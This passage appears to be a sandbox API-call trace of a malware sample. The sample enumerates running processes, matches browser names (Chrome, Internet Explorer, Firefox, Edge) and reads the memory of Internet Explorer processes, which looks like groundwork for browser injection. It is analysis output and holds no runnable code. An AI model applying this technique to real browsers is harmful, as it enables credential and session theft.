	[0221.537] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0221.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.538] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0221.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5128
	[0221.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.539] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0221.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.540] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.540] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0221.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.541] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.541] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0221.542] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x512c
	[0221.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.542] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0221.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.543] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.544] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0221.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.544] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0221.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5130
	[0221.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.545] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0221.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.545] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0221.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.546] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0221.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.546] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.546] NtQueryInformationProcess (in: ProcessHandle=0x5130, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0221.546] ReadProcessMemory (in: hProcess=0x5130, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0221.546] ReadProcessMemory (in: hProcess=0x5130, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0221.547] ReadProcessMemory (in: hProcess=0x5130, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0221.547] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0221.547] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0221.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5134
	[0221.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.548] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0221.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.548] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0221.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.548] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0221.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.548] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.549] NtQueryInformationProcess (in: ProcessHandle=0x5134, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0221.549] ReadProcessMemory (in: hProcess=0x5134, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0221.549] ReadProcessMemory (in: hProcess=0x5134, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0221.549] ReadProcessMemory (in: hProcess=0x5134, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0221.549] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0221.549] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0221.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5138
	[0221.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.550] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0221.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.550] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.551] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0221.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.551] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0221.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x513c
	[0221.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.552] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0221.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.552] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.553] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0221.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.553] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5140
	[0221.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.554] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.555] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.555] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.555] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.556] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5144
	[0221.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.557] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.557] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.557] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.558] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.558] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5148
	[0221.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.559] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.559] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.559] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.560] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0221.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x514c
	[0221.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.561] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0221.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.561] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.561] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0221.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.562] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0221.563] CloseHandle (hObject=0x4fd0) returned 1
	[0221.563] Sleep (dwMilliseconds=0x64) 
	[0221.661] GetCurrentProcessId () returned 0x110
	[0221.661] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0221.667] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0221.669] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0221.671] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0221.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5150
	[0221.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.679] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.679] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.679] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.679] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.680] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0221.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5154
	[0221.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.680] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.681] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.681] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.681] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.681] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0221.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5158
	[0221.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.682] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0221.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.683] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.683] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0221.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.683] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.683] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0221.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x515c
	[0221.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.684] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.685] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.685] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.685] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.685] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0221.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5160
	[0221.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.686] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0221.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.687] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.687] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0221.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.687] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.688] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0221.689] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5164
	[0221.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.689] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0221.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.689] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.690] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0221.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.690] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0221.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5168
	[0221.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.691] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0221.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.691] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.692] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0221.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.692] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.692] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0221.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x516c
	[0221.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.693] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0221.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.694] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.694] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0221.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.694] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.694] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5170
	[0221.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.695] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.696] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.696] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.697] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5174
	[0221.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.698] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.698] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.698] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.699] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.699] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5178
	[0221.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.700] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.700] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.700] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.701] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
